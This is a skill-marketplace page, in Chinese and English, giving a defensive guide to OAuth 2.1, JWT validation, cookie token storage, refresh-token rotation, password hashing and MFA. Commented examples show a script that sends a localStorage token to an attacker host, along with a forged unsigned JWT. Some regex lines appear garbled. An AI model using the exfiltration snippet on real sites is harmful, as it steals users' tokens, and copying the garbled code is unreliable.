OAuth 2.1 迁移指南与安全最佳实践 | 认证安全专家详解

auth-security-expert by oimiragieo/agent-studio

70 周安装量

19 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/oimiragieo/agent-studio --skill auth-security-expert

网络协议分析 API 安全

🇨🇳中文介绍

认证安全专家

⚠️ 关键信息：OAuth 2.1 将于 2026 年第二季度成为强制性要求

OAuth 2.1 将十年的安全最佳实践整合到一个规范中（draft-ietf-oauth-v2-1）。Google、Microsoft 和 Okta 已经弃用了传统的 OAuth 2.0 流程，强制执行截止日期为 2026 年第二季度。

OAuth 2.0 所需的变更

1. PKCE 对所有客户端都是必需的

以前是可选的，现在对公共客户端和机密客户端都是强制性的
防止授权码拦截和注入攻击
代码验证器：43-128 个加密随机的 URL 安全字符
代码挑战：BASE64URL(SHA256(code_verifier))
代码挑战方法：必须是 'S256'（SHA-256），不能是 'plain'

// 正确的 PKCE 实现 async function generatePKCE() { const array = new Uint8Array(32); // 256 位 crypto.getRandomValues(array); // 加密安全的随机数 const verifier = base64UrlEncode(array);

const encoder = new TextEncoder(); const hash = await crypto.subtle.digest('SHA-256', encoder.encode(verifier)); const challenge = base64UrlEncode(new Uint8Array(hash));

return { verifier, challenge }; }

// 辅助函数：Base64 URL 编码 function base64UrlEncode(buffer) { return btoa(String.fromCharCode(...new Uint8Array(buffer))) .replace(/+/g, '-') .replace(///g, '_') .replace(/=+$/, ''); }

2. 隐式流程已移除

❌ response_type=token 或 response_type=id_token token - 禁止使用
URL 片段中暴露的令牌会通过以下方式泄露：

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

JWT 安全（RFC 8725 - 最佳实践）

⚠️ 关键信息：JWT 漏洞在 OWASP Top 10 中（身份验证破坏）

令牌生命周期最佳实践

有效期：最长 ≤15 分钟（推荐：5-15 分钟）
短期有效以限制令牌被盗造成的损害
无状态验证（无需数据库查询）
包含最少的声明（用户 ID、权限、过期时间）

有效期：数天到数周（通常 7-30 天）
必须实现轮换（签发新的，使旧的失效）
安全地存储在服务器端（哈希处理，类似密码）
可撤销（需要数据库查询）

ID 令牌（OpenID Connect）：

短期有效（5-60 分钟）
包含用户配置文件信息
必须验证签名和声明
切勿用于 API 授权（使用访问令牌）

JWT 签名算法（RFC 8725）

✅ 推荐算法：

RS256（RSA 与 SHA-256）

非对称签名（私钥签名，公钥验证）
最适合分布式系统（API 网关无需私钥即可验证）
密钥大小：至少 2048 位（高安全性使用 4096 位）

const jwt = require('jsonwebtoken'); const fs = require('fs');

// 使用私钥签名 const privateKey = fs.readFileSync('private.pem'); const token = jwt.sign(payload, privateKey, { algorithm: 'RS256', expiresIn: '15m', issuer: 'https://auth.example.com', audience: 'api.example.com', keyid: 'key-2024-01', // 密钥轮换跟踪 });

// 使用公钥验证 const publicKey = fs.readFileSync('public.pem'); const decoded = jwt.verify(token, publicKey, { algorithms: ['RS256'], // 仅白名单允许的算法 issuer: 'https://auth.example.com', audience: 'api.example.com', });

ES256（ECDSA 与 SHA-256）

非对称签名（比 RSA 密钥更小，安全性相同）
比 RSA 签名/验证更快
密钥大小：256 位（相当于 3072 位 RSA）

// 生成 ES256 密钥对（一次性设置） const { generateKeyPairSync } = require('crypto'); const { privateKey, publicKey } = generateKeyPairSync('ec', { namedCurve: 'prime256v1', // P-256 曲线 });

const token = jwt.sign(payload, privateKey, { algorithm: 'ES256', expiresIn: '15m', });

⚠️ 谨慎使用：

HS256（HMAC 与 SHA-256）

对称签名（签名和验证使用相同的密钥）
仅适用于单服务器系统（验证需要共享密钥）
切勿向客户端暴露密钥
如果 API 网关/微服务需要验证令牌，切勿使用

// 仅当所有验证都在同一服务器上时使用 HS256 const secret = process.env.JWT_SECRET; // 至少 256 位 const token = jwt.sign(payload, secret, { algorithm: 'HS256', expiresIn: '15m', });

const decoded = jwt.verify(token, secret, { algorithms: ['HS256'], // 仍然需要算法白名单 });

❌ 禁止算法：

none（无签名）

// 切勿接受未签名的令牌
const decoded = jwt.verify(token, null, {
  algorithms: ['none'], // ❌ 严重漏洞
});

// 攻击者可以创建令牌：{"alg":"none","typ":"JWT"}.{"sub":"admin"}

// 始终白名单允许的算法，绝不允许 'none'
jwt.verify(token, publicKey, {
  algorithms: ['RS256', 'ES256'], // 仅白名单
});

JWT 验证（完整清单）

async function validateAccessToken(token) {
  try {
    // 1. 首先解析而不验证（检查 'alg'）
    const unverified = jwt.decode(token, { complete: true });

    // 2. 拒绝 'none' 算法
    if (!unverified || unverified.header.alg === 'none') {
      throw new Error('不允许未签名的 JWT');
    }

    // 3. 使用公钥验证签名
    const publicKey = await getPublicKey(unverified.header.kid); // 密钥 ID
    const decoded = jwt.verify(token, publicKey, {
      algorithms: ['RS256', 'ES256'], // 白名单预期的算法
      issuer: 'https://auth.example.com', // 预期的签发者
      audience: 'api.example.com', // 此 API 的标识符
      clockTolerance: 30, // 允许 30 秒时钟偏差
      complete: false, // 仅返回有效载荷
    });

    // 4. 验证必需的声明
    if (!decoded.sub) throw new Error('缺少 subject (sub) 声明');
    if (!decoded.exp) throw new Error('缺少 expiry (exp) 声明');
    if (!decoded.iat) throw new Error('缺少 issued-at (iat) 声明');
    if (!decoded.jti) throw new Error('缺少 JWT ID (jti) 声明');

    // 5. 验证令牌有效期（与 jwt.verify 双重检查）
    const now = Math.floor(Date.now() / 1000);
    if (decoded.exp <= now) throw new Error('令牌已过期');
    if (decoded.nbf && decoded.nbf > now) throw new Error('令牌尚未生效');

    // 6. 检查令牌是否被撤销（如果实现了撤销列表）
    if (await isTokenRevoked(decoded.jti)) {
      throw new Error('令牌已被撤销');
    }

    // 7. 验证自定义声明
    if (decoded.scope && !decoded.scope.includes('read:resource')) {
      throw new Error('权限不足');
    }

    return decoded;
  } catch (error) {
    // 如果任何验证失败，切勿使用该令牌
    console.error('JWT 验证失败：', error.message);
    throw new Error('无效令牌');
  }
}

JWT 声明（RFC 7519）

注册声明（标准）：

iss（签发者）：授权服务器 URL - 验证
sub（主体）：用户 ID（唯一，不可变） - 必需
aud（受众）：API/服务标识符 - 验证
exp（过期时间）：Unix 时间戳 - 必需，访问令牌 ≤15 分钟
iat（签发时间）：Unix 时间戳 - 必需
nbf（生效时间）：Unix 时间戳 - 可选
jti（JWT ID）：唯一令牌 ID - 撤销所必需

自定义声明（应用特定）：

const payload = {
  // 标准声明
  iss: 'https://auth.example.com',
  sub: 'user_12345',
  aud: 'api.example.com',
  exp: Math.floor(Date.now() / 1000) + 15 * 60, // 15 分钟
  iat: Math.floor(Date.now() / 1000),
  jti: crypto.randomUUID(),

  // 自定义声明
  scope: 'read:profile write:profile admin:users',
  role: 'admin',
  tenant_id: 'tenant_789',
  email: 'user@example.com', // 访问令牌中可以包含，不敏感
  // 切勿包含：密码、SSN、信用卡等。
};

⚠️ 切勿在 JWT 中存储敏感数据：

JWT 是 base64 编码的，不是加密的（任何人都可以解码）
假设所有 JWT 内容都是公开的
如果必须包含敏感数据，请使用加密的 JWE（JSON Web 加密）

✅ 正确方式：HttpOnly Cookie（服务器端）

// 服务器在 OAuth 回调后将令牌设置为 HttpOnly cookie
app.post('/auth/callback', async (req, res) => {
  const { access_token, refresh_token } = await exchangeCodeForTokens(req.body.code);

  // 访问令牌 cookie
  res.cookie('access_token', access_token, {
    httpOnly: true, // JavaScript 无法访问（XSS 防护）
    secure: true, // 仅 HTTPS
    sameSite: 'strict', // CSRF 防护（阻止跨站请求）
    maxAge: 15 * 60 * 1000, // 15 分钟
    path: '/',
    domain: '.example.com', // 允许子域
  });

  // 刷新令牌 cookie（限制更严格）
  res.cookie('refresh_token', refresh_token, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 7 * 24 * 60 * 60 * 1000, // 7 天
    path: '/auth/refresh', // 仅刷新端点可访问
    domain: '.example.com',
  });

  res.json({ success: true });
});

// 客户端发起认证请求（浏览器自动发送 cookie）
fetch('https://api.example.com/user/profile', {
  credentials: 'include', // 请求中包含 cookie
});

❌ 错误方式：localStorage/sessionStorage

// ❌ 易受 XSS 攻击
localStorage.setItem('access_token', token);
sessionStorage.setItem('access_token', token);

// 任何 XSS 漏洞（即使是第三方脚本）都可以窃取令牌：
// <script>
//   const token = localStorage.getItem('access_token');
//   fetch('https://attacker.com/steal?token=' + token);
// </script>

为什么 HttpOnly Cookie 能防止 XSS 窃取：

httpOnly: true 使 cookie 对 JavaScript 不可访问（document.cookie 返回空）
即使存在 XSS，攻击者也无法读取令牌
浏览器自动在请求中包含 cookie（无需 JavaScript）

带有重用检测的刷新令牌轮换

攻击方式：刷新令牌窃取 如果攻击者窃取刷新令牌，他们可以在刷新令牌过期（数天/数周）前生成无限数量的访问令牌。

防御措施：轮换 + 重用检测 每次刷新都会生成新的刷新令牌并使旧的失效。如果旧令牌再次被使用，该用户的所有令牌都会被撤销（表示可能发生窃取）。

服务器端实现：

app.post('/auth/refresh', async (req, res) => {
  const oldRefreshToken = req.cookies.refresh_token;

  try {
    // 1. 验证刷新令牌（检查签名、过期时间）
    const decoded = jwt.verify(oldRefreshToken, publicKey, {
      algorithms: ['RS256'],
      issuer: 'https://auth.example.com',
    });

    // 2. 在数据库中查找令牌（我们存储哈希后的刷新令牌）
    const tokenHash = crypto.createHash('sha256').update(oldRefreshToken).digest('hex');
    const tokenRecord = await db.refreshTokens.findOne({
      tokenHash,
      userId: decoded.sub,
    });

    if (!tokenRecord) {
      throw new Error('未找到刷新令牌');
    }

    // 3. 关键：检测令牌重用（可能发生窃取）
    if (tokenRecord.isUsed) {
      // 令牌已被使用 - 这是重用攻击
      await db.refreshTokens.deleteMany({ userId: decoded.sub }); // 撤销所有令牌
      await logSecurityEvent('REFRESH_TOKEN_REUSE_DETECTED', {
        userId: decoded.sub,
        tokenId: decoded.jti,
        ip: req.ip,
        userAgent: req.headers['user-agent'],
      });

      // 向用户邮箱发送警报
      await sendSecurityAlert(decoded.sub, '检测到令牌窃取 - 所有会话已终止');

      return res.status(401).json({
        error: 'token_reuse',
        error_description: '检测到刷新令牌重用 - 所有会话已撤销',
      });
    }

    // 4. 将旧令牌标记为已使用（在签发新令牌前执行原子操作）
    await db.refreshTokens.updateOne(
      { tokenHash },
      {
        $set: { isUsed: true, lastUsedAt: new Date() },
      }
    );

    // 5. 生成新令牌
    const newAccessToken = jwt.sign(
      {
        sub: decoded.sub,
        scope: decoded.scope,
        exp: Math.floor(Date.now() / 1000) + 15 * 60,
      },
      privateKey,
      { algorithm: 'RS256' }
    );

    const newRefreshToken = jwt.sign(
      {
        sub: decoded.sub,
        scope: decoded.scope,
        exp: Math.floor(Date.now() / 1000) + 7 * 24 * 60 * 60, // 7 天
        jti: crypto.randomUUID(),
      },
      privateKey,
      { algorithm: 'RS256' }
    );

    // 6. 存储新的刷新令牌（哈希后）
    const newTokenHash = crypto.createHash('sha256').update(newRefreshToken).digest('hex');
    await db.refreshTokens.create({
      userId: decoded.sub,
      tokenHash: newTokenHash,
      isUsed: false,
      expiresAt: new Date(Date.now() + 7 * 24 * 60 * 60 * 1000),
      createdAt: new Date(),
      userAgent: req.headers['user-agent'],
      ipAddress: req.ip,
    });

    // 7. 将新令牌设置为 cookie
    res.cookie('access_token', newAccessToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 15 * 60 * 1000,
    });

    res.cookie('refresh_token', newRefreshToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 7 * 24 * 60 * 60 * 1000,
      path: '/auth/refresh',
    });

    res.json({ success: true });
  } catch (error) {
    // 清除无效的 cookie
    res.clearCookie('refresh_token');
    res.status(401).json({ error: 'invalid_token' });
  }
});

数据库模式（刷新令牌）：

{
  userId: 'user_12345',
  tokenHash: 'sha256_hash_of_refresh_token', // 切勿存储明文
  isUsed: false, // 当令牌用于刷新时设置为 true
  expiresAt: ISODate('2026-02-01T00:00:00Z'),
  createdAt: ISODate('2026-01-25T00:00:00Z'),
  lastUsedAt: null, // isUsed 设置为 true 时更新
  userAgent: 'Mozilla/5.0...',
  ipAddress: '192.168.1.1',
  jti: 'uuid-v4', // 与 JWT 'jti' 声明匹配
}

密码哈希（2026 年最佳实践）

推荐：Argon2id

密码哈希竞赛的获胜者（2015 年）
抗 GPU 破解和侧信道攻击
可配置的内存、时间和并行度参数

// Argon2id 示例（Node.js） import argon2 from 'argon2';

// 哈希密码 const hash = await argon2.hash(password, { type: argon2.argon2id, memoryCost: 19456, // 19 MiB timeCost: 2, parallelism: 1, });

// 验证密码 const isValid = await argon2.verify(hash, password);

可接受的替代方案：bcrypt

仍然安全，但在相同安全级别下比 Argon2id 慢
工作因子：最小 12（2026 年推荐 14+）

// bcrypt 示例 import bcrypt from 'bcryptjs';

const hash = await bcrypt.hash(password, 14); // 成本因子 14 const isValid = await bcrypt.compare(password, hash);

单独的 MD5、SHA-1、SHA-256（非为密码设计）
明文存储
可逆加密

多因素认证（MFA）

TOTP（基于时间的一次性密码）

应用：Google Authenticator、Authy、1Password
每 30 秒轮换一次的 6 位代码
支持离线使用

WebAuthn/FIDO2（通行密钥）

最安全的选项（抗钓鱼攻击）
硬件令牌（YubiKey）或平台认证器（Face ID、Touch ID）
公钥加密，无共享密钥

基于短信的 MFA（传统 - 不推荐）

易受 SIM 卡交换攻击
仅作为备用方案，切勿作为主要 MFA

在 MFA 注册期间提供一次性恢复代码
安全存储（数据库中哈希处理）

实现最佳实践：

允许每个用户使用多种 MFA 方法
对管理员/特权账户强制执行 MFA
提供清晰的注册和恢复流程
未经适当验证，切勿绕过 MFA

通行密钥 / WebAuthn

为什么使用通行密钥：

抗钓鱼攻击（与来源的加密绑定）
无共享密钥泄露或拦截风险
无密码认证
跨设备同步（Apple、Google、Microsoft 生态系统）

使用 @simplewebauthn/server（Node.js）或类似库
支持平台认证器（生物识别）和漫游认证器（安全密钥）
在过渡期间提供备用认证方法

WebAuthn 注册流程：

服务器生成挑战
客户端使用认证器创建凭证
客户端向服务器发送公钥
服务器存储与用户账户关联的公钥

WebAuthn 认证流程：

服务器生成挑战
客户端使用私钥（存储在认证器中）对挑战进行签名
服务器使用存储的公钥验证签名

安全会话实践：

对会话令牌使用安全的、HTTP-only 的 cookie
- Set-Cookie: session=...; Secure; HttpOnly; SameSite=Strict
实现绝对超时（例如 24 小时）
实现空闲超时（例如 30 分钟不活动）
登录后重新生成会话 ID（防止会话固定）
提供"注销所有设备"功能

服务器端会话存储（Redis、数据库）
不要在客户端存储中存储敏感数据
密码更改时实现会话撤销

必要的 HTTP 安全头部：

Strict-Transport-Security: max-age=31536000; includeSubDomains（HSTS）
X-Content-Type-Options: nosniff
X-Frame-Options: DENY 或 SAMEORIGIN
Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block（旧版支持）

需要防范的常见漏洞

使用参数化查询（SQL 注入防护）
验证和清理所有用户输入
使用具有内置防护的 ORM

跨站脚本（XSS）：

在模板中转义输出
使用内容安全策略头部
切勿将 eval() 或 innerHTML 与用户输入一起使用

跨站请求伪造（CSRF）：

对状态更改操作使用 CSRF 令牌
验证 origin/referer 头部
使用 SameSite cookie 属性

身份验证破坏：

强制执行强密码策略
失败尝试后实现账户锁定
对敏感操作使用 MFA
切勿暴露用户枚举（"用户未找到"和"密码无效"使用相同的错误信息）

此专家技能整合了 1 项独立技能：

auth-security-expert

security-architect - 威胁建模（STRIDE）、OWASP Top 10 和安全架构模式

切勿将 JWT 存储在 localStorage 中 — localStorage 对页面上的任何 JavaScript 都是可访问的，使其极易受到 XSS 攻击；始终使用 httpOnly 安全 cookie。
在使用任何声明之前，始终验证 JWT 签名 — 未经验证的 JWT 可能被伪造；在验证签名与预期算法和密钥匹配之前，切勿解码声明。
切勿使用客户端可访问的密钥的 HS256 — 当客户端持有密钥时，HS256 共享密钥会暴露；使用 RS256 或 ES256，以便只有服务器可以签名。
切勿允许隐式 OAuth 授权 — 隐式授权在 OAuth 2.1 中已弃用，因为令牌会在重定向片段中泄露；始终使用授权码 + PKCE。
始终将 JWT 访问令牌有效期设置为 15 分钟或更短 — 长期有效的访问令牌在泄露后仍然有效；使用刷新令牌轮换来维持会话，而无需长期有效的令牌。

反模式	失败原因	正确方法
JWT 存储在 localStorage 中	可被 XSS 访问；任何脚本都可以窃取令牌	使用 httpOnly 安全 cookie
无 JWT 签名验证	伪造的令牌被静默接受	始终调用 verify()，而不仅仅是 decode()
使用客户端密钥的 HS256	密钥嵌入在客户端代码中；容易被提取	使用服务器端私钥的 RS256/ES256
隐式 OAuth 授权	令牌在 URL 片段中通过 referrer 头部泄露	授权码 + PKCE 流程
访问令牌有效期 >15 分钟	被盗令牌在泄露后有效时间过长	将 exp 设置为 5-15 分钟；使用刷新令牌轮换

记忆协议（强制）

cat .claude/context/memory/learnings.md

完成后： 记录发现的任何新模式或例外情况。

假设中断：您的上下文可能会重置。如果不在记忆中，那就没有发生过。

2026 年 1 月 27 日

🇺🇸English

Auth Security Expert

⚠️ CRITICAL: OAuth 2.1 becomes MANDATORY Q2 2026

OAuth 2.1 consolidates a decade of security best practices into a single specification (draft-ietf-oauth-v2-1). Google, Microsoft, and Okta have already deprecated legacy OAuth 2.0 flows with enforcement deadlines in Q2 2026.

Required Changes from OAuth 2.0

1. PKCE is REQUIRED for ALL Clients

Previously optional, now MANDATORY for public AND confidential clients
Prevents authorization code interception and injection attacks
Code verifier: 43-128 cryptographically random URL-safe characters
Code challenge: BASE64URL(SHA256(code_verifier))
Code challenge method: MUST be 'S256' (SHA-256), not 'plain'

// Correct PKCE implementation async function generatePKCE() { const array = new Uint8Array(32); // 256 bits crypto.getRandomValues(array); // Cryptographically secure random const verifier = base64UrlEncode(array);

const encoder = new TextEncoder(); const hash = await crypto.subtle.digest('SHA-256', encoder.encode(verifier)); const challenge = base64UrlEncode(new Uint8Array(hash));

return { verifier, challenge }; }

// Helper: Base64 URL encoding function base64UrlEncode(buffer) { return btoa(String.fromCharCode(...new Uint8Array(buffer))) .replace(/+/g, '-') .replace(///g, '_') .replace(/=+$/, ''); }

2. Implicit Flow REMOVED

❌ response_type=token or response_type=id_token token - FORBIDDEN
Tokens exposed in URL fragments leak via:
- Browser history
- Referrer headers to third-party scripts
- Server logs (if fragment accidentally logged)
- Browser extensions
Migration : Use Authorization Code Flow + PKCE for ALL SPAs

3. Resource Owner Password Credentials (ROPC) REMOVED

❌ grant_type=password - FORBIDDEN
Violates delegated authorization principle
Increases phishing and credential theft risk
Forces users to trust client with credentials
Migration : Authorization Code Flow for users, Client Credentials for services

4. Bearer Tokens in URI Query Parameters FORBIDDEN

❌ GET /api/resource?access_token=xyz - FORBIDDEN
Tokens leak via:
- Server access logs
- Proxy logs
- Browser history
- Referrer headers
✅ Use Authorization header: Authorization: Bearer <token>
✅ Or secure POST body parameter

5. Exact Redirect URI Matching REQUIRED

No wildcards: https://*.example.com - FORBIDDEN
No partial matches or subdomain wildcards
MUST perform exact string comparison
Prevents open redirect vulnerabilities
Implementation : Register each redirect URI explicitly

// Server-side redirect URI validation function validateRedirectUri(requestedUri, registeredUris) { // EXACT match required - no wildcards, no normalization return registeredUris.includes(requestedUri); }

6. Refresh Token Protection REQUIRED

MUST implement ONE of:
- Sender-constrained tokens (mTLS, DPoP - Demonstrating Proof-of-Possession)
- Refresh token rotation with reuse detection (recommended for most apps)

PKCE Downgrade Attack Prevention

The Attack: Attacker intercepts authorization request and strips code_challenge parameters. If authorization server allows backward compatibility with OAuth 2.0 (non-PKCE), it proceeds without PKCE protection. Attacker steals authorization code and exchanges it without needing the code_verifier.

Prevention (Server-Side):

// Authorization endpoint - REJECT requests without PKCE
app.get('/authorize', (req, res) => {
  const { code_challenge, code_challenge_method } = req.query;

  // OAuth 2.1: PKCE is MANDATORY
  if (!code_challenge || !code_challenge_method) {
    return res.status(400).json({
      error: 'invalid_request',
      error_description: 'code_challenge required (OAuth 2.1)',
    });
  }

  if (code_challenge_method !== 'S256') {
    return res.status(400).json({
      error: 'invalid_request',
      error_description: 'code_challenge_method must be S256',
    });
  }

  // Continue authorization flow...
});

// Token endpoint - VERIFY code_verifier
app.post('/token', async (req, res) => {
  const { code, code_verifier } = req.body;

  const authCode = await db.authorizationCodes.findOne({ code });

  if (!authCode.code_challenge) {
    return res.status(400).json({
      error: 'invalid_grant',
      error_description: 'Authorization code was not issued with PKCE',
    });
  }

  // Verify code_verifier matches code_challenge
  const hash = crypto.createHash('sha256').update(code_verifier).digest();
  const challenge = base64UrlEncode(hash);

  if (challenge !== authCode.code_challenge) {
    return res.status(400).json({
      error: 'invalid_grant',
      error_description: 'code_verifier does not match code_challenge',
    });
  }

  // Issue tokens...
});

Authorization Code Flow with PKCE (Step-by-Step)

Client-Side Implementation:

// Step 1: Generate PKCE parameters
const { verifier, challenge } = await generatePKCE();
sessionStorage.setItem('pkce_verifier', verifier); // Temporary only
sessionStorage.setItem('oauth_state', generateRandomState()); // CSRF protection

// Step 2: Redirect to authorization endpoint
const authUrl = new URL('https://auth.example.com/authorize');
authUrl.searchParams.set('response_type', 'code');
authUrl.searchParams.set('client_id', CLIENT_ID);
authUrl.searchParams.set('redirect_uri', REDIRECT_URI); // MUST match exactly
authUrl.searchParams.set('scope', 'openid profile email');
authUrl.searchParams.set('state', sessionStorage.getItem('oauth_state'));
authUrl.searchParams.set('code_challenge', challenge);
authUrl.searchParams.set('code_challenge_method', 'S256');

window.location.href = authUrl.toString();

// Step 3: Handle callback (after user authorizes)
// URL: https://yourapp.com/callback?code=xyz&state=abc
const urlParams = new URLSearchParams(window.location.search);
const code = urlParams.get('code');
const state = urlParams.get('state');

// Validate state (CSRF protection)
if (state !== sessionStorage.getItem('oauth_state')) {
  throw new Error('State mismatch - possible CSRF attack');
}

// Step 4: Exchange code for tokens
const response = await fetch('https://auth.example.com/token', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: new URLSearchParams({
    grant_type: 'authorization_code',
    code: code,
    redirect_uri: REDIRECT_URI, // MUST match authorization request
    client_id: CLIENT_ID,
    code_verifier: sessionStorage.getItem('pkce_verifier'), // Prove possession
  }),
});

const tokens = await response.json();

// Clear PKCE parameters immediately
sessionStorage.removeItem('pkce_verifier');
sessionStorage.removeItem('oauth_state');

// Server should set tokens as HttpOnly cookies (see Token Storage section)

OAuth 2.1 Security Checklist

Before Production Deployment:

PKCE enabled for ALL clients (public AND confidential)
PKCE downgrade prevention (reject requests without code_challenge)
Implicit Flow completely disabled/removed
Password Credentials Flow disabled/removed
Exact redirect URI matching enforced (no wildcards)
Tokens NEVER in URL query parameters
Authorization server rejects 'code_challenge_method=plain'
State parameter validated (CSRF protection)
All communication over HTTPS only
Token endpoint requires client authentication (for confidential clients)

JWT Security (RFC 8725 - Best Practices)

⚠️ CRITICAL: JWT vulnerabilities are in OWASP Top 10 (Broken Authentication)

Token Lifecycle Best Practices

Access Tokens:

Lifetime: ≤15 minutes maximum (recommended: 5-15 minutes)
Short-lived to limit damage from token theft
Stateless validation (no database lookup needed)
Include minimal claims (user ID, permissions, expiry)

Refresh Tokens:

Lifetime: Days to weeks (7-30 days typical)
MUST implement rotation (issue new, invalidate old)
Stored securely server-side (hashed, like passwords)
Revocable (require database lookup)

ID Tokens (OpenID Connect):

Short-lived (5-60 minutes)
Contains user profile information
MUST validate signature and claims
Never use for API authorization (use access tokens)

JWT Signature Algorithms (RFC 8725)

✅ RECOMMENDED Algorithms:

RS256 (RSA with SHA-256)

Asymmetric signing (private key signs, public key verifies)
Best for distributed systems (API gateway can verify without private key)
Key size: 2048-bit minimum (4096-bit for high security)

const jwt = require('jsonwebtoken'); const fs = require('fs');

// Sign with private key const privateKey = fs.readFileSync('private.pem'); const token = jwt.sign(payload, privateKey, { algorithm: 'RS256', expiresIn: '15m', issuer: 'https://auth.example.com', audience: 'api.example.com', keyid: 'key-2024-01', // Key rotation tracking });

// Verify with public key const publicKey = fs.readFileSync('public.pem'); const decoded = jwt.verify(token, publicKey, { algorithms: ['RS256'], // Whitelist ONLY expected algorithm issuer: 'https://auth.example.com', audience: 'api.example.com', });

ES256 (ECDSA with SHA-256)

Asymmetric signing (smaller keys than RSA, same security)
Faster signing/verification than RSA
Key size: 256-bit (equivalent to 3072-bit RSA)

// Generate ES256 key pair (one-time setup) const { generateKeyPairSync } = require('crypto'); const { privateKey, publicKey } = generateKeyPairSync('ec', { namedCurve: 'prime256v1', // P-256 curve });

const token = jwt.sign(payload, privateKey, { algorithm: 'ES256', expiresIn: '15m', });

⚠️ USE WITH CAUTION:

HS256 (HMAC with SHA-256)

Symmetric signing (same secret for sign and verify)
ONLY for single-server systems (secret must be shared to verify)
NEVER expose secret to clients
NEVER use if API gateway/microservices need to verify tokens

// Only use HS256 if ALL verification happens on same server const secret = process.env.JWT_SECRET; // 256-bit minimum const token = jwt.sign(payload, secret, { algorithm: 'HS256', expiresIn: '15m', });

const decoded = jwt.verify(token, secret, { algorithms: ['HS256'], // STILL whitelist algorithm });

❌ FORBIDDEN Algorithms:

none (No Signature)

// NEVER accept unsigned tokens
const decoded = jwt.verify(token, null, {
  algorithms: ['none'], // ❌ CRITICAL VULNERABILITY
});

// Attacker can create token: {"alg":"none","typ":"JWT"}.{"sub":"admin"}

Prevention:

// ALWAYS whitelist allowed algorithms, NEVER allow 'none'
jwt.verify(token, publicKey, {
  algorithms: ['RS256', 'ES256'], // Whitelist only
});

JWT Validation (Complete Checklist)

async function validateAccessToken(token) {
  try {
    // 1. Parse without verification first (to check 'alg')
    const unverified = jwt.decode(token, { complete: true });

    // 2. Reject 'none' algorithm
    if (!unverified || unverified.header.alg === 'none') {
      throw new Error('Unsigned JWT not allowed');
    }

    // 3. Verify signature with public key
    const publicKey = await getPublicKey(unverified.header.kid); // Key ID
    const decoded = jwt.verify(token, publicKey, {
      algorithms: ['RS256', 'ES256'], // Whitelist expected algorithms
      issuer: 'https://auth.example.com', // Expected issuer
      audience: 'api.example.com', // This API's identifier
      clockTolerance: 30, // Allow 30s clock skew
      complete: false, // Return payload only
    });

    // 4. Validate required claims
    if (!decoded.sub) throw new Error('Missing subject (sub) claim');
    if (!decoded.exp) throw new Error('Missing expiry (exp) claim');
    if (!decoded.iat) throw new Error('Missing issued-at (iat) claim');
    if (!decoded.jti) throw new Error('Missing JWT ID (jti) claim');

    // 5. Validate token lifetime (belt-and-suspenders with jwt.verify)
    const now = Math.floor(Date.now() / 1000);
    if (decoded.exp <= now) throw new Error('Token expired');
    if (decoded.nbf && decoded.nbf > now) throw new Error('Token not yet valid');

    // 6. Check token revocation (if implementing revocation list)
    if (await isTokenRevoked(decoded.jti)) {
      throw new Error('Token has been revoked');
    }

    // 7. Validate custom claims
    if (decoded.scope && !decoded.scope.includes('read:resource')) {
      throw new Error('Insufficient permissions');
    }

    return decoded;
  } catch (error) {
    // NEVER use the token if ANY validation fails
    console.error('JWT validation failed:', error.message);
    throw new Error('Invalid token');
  }
}

JWT Claims (RFC 7519)

Registered Claims (Standard):

iss (issuer): Authorization server URL - VALIDATE
sub (subject): User ID (unique, immutable) - REQUIRED
aud (audience): API/service identifier - VALIDATE
exp (expiration): Unix timestamp - REQUIRED, ≤15 min for access tokens
iat (issued at): Unix timestamp - REQUIRED
nbf (not before): Unix timestamp - OPTIONAL
jti (JWT ID): Unique token ID - REQUIRED for revocation

Custom Claims (Application-Specific):

const payload = {
  // Standard claims
  iss: 'https://auth.example.com',
  sub: 'user_12345',
  aud: 'api.example.com',
  exp: Math.floor(Date.now() / 1000) + 15 * 60, // 15 minutes
  iat: Math.floor(Date.now() / 1000),
  jti: crypto.randomUUID(),

  // Custom claims
  scope: 'read:profile write:profile admin:users',
  role: 'admin',
  tenant_id: 'tenant_789',
  email: 'user@example.com', // OK for access token, not sensitive
  // NEVER include: password, SSN, credit card, etc.
};

⚠️ NEVER Store Sensitive Data in JWT:

JWTs are base64-encoded, NOT encrypted (anyone can decode)
Assume all JWT contents are public
Use encrypted JWE (JSON Web Encryption) if you must include sensitive data

Token Storage Security

✅ CORRECT: HttpOnly Cookies (Server-Side)

// Server sets tokens as HttpOnly cookies after OAuth callback
app.post('/auth/callback', async (req, res) => {
  const { access_token, refresh_token } = await exchangeCodeForTokens(req.body.code);

  // Access token cookie
  res.cookie('access_token', access_token, {
    httpOnly: true, // Cannot be accessed by JavaScript (XSS protection)
    secure: true, // HTTPS only
    sameSite: 'strict', // CSRF protection (blocks cross-site requests)
    maxAge: 15 * 60 * 1000, // 15 minutes
    path: '/',
    domain: '.example.com', // Allow subdomains
  });

  // Refresh token cookie (more restricted)
  res.cookie('refresh_token', refresh_token, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days
    path: '/auth/refresh', // ONLY accessible by refresh endpoint
    domain: '.example.com',
  });

  res.json({ success: true });
});

// Client makes authenticated requests (browser sends cookie automatically)
fetch('https://api.example.com/user/profile', {
  credentials: 'include', // Include cookies in request
});

❌ WRONG: localStorage/sessionStorage

// ❌ VULNERABLE TO XSS ATTACKS
localStorage.setItem('access_token', token);
sessionStorage.setItem('access_token', token);

// Any XSS vulnerability (even third-party script) can steal tokens:
// <script>
//   const token = localStorage.getItem('access_token');
//   fetch('https://attacker.com/steal?token=' + token);
// </script>

Why HttpOnly Cookies Prevent XSS Theft:

httpOnly: true makes cookie inaccessible to JavaScript (document.cookie returns empty)
Even if XSS exists, attacker cannot read the token
Browser automatically includes cookie in requests (no JavaScript needed)

Refresh Token Rotation with Reuse Detection

The Attack: Refresh Token Theft If attacker steals refresh token, they can generate unlimited access tokens until refresh token expires (days/weeks).

The Defense: Rotation + Reuse Detection Every refresh generates new refresh token and invalidates old one. If old token is used again, ALL tokens for that user are revoked (signals possible theft).

Server-Side Implementation:

